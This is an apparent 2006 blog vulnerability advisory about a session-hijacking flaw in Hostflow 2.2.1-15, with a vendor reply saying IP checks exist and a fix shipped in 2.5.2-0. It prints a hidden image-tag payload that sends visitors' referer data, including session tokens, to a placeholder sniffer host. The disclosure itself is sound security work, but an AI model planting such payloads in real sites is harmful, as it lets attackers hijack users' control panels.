by r0t,der4444,cembo,VietMafia

Tuesday, June 27, 2006

Hostflow vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 june 2006
vendor:http://www.hostflow.com/
affected versions:2.2.1-15 and previous
###############################################

Vuln. Description:

Hostflow contains a flaw which could allow a remote attacker to hijack user sessions. A remote attacker can retrieve the authentication information to hijack a user session if a user includes a URL link within a helpdesk message because in default there isn't IP address verification. This would allow the attacker to take control victims control panel.


example:

1.
post:
(img src="http://[sniffer-host]/r0t.gif" width="0" height="0")
note: change "(" to "<" and ")" to ">"

2. or it also will works with simple refferal url function.
For manual testing use html code and create hyperlink to resource wich will show you refferal urlĀ“s in example some hit counter or statistic apllication do it well.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

1 Comments:

Anonymous Anonymous told...

By default, an IP chek is done and a session is only valid for a specific IP.

By the way, this issue has been fixed in Hostflow 2.5.2-0 released on July 10. 2006


The hostflow technical support.

9:44 AM

 

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew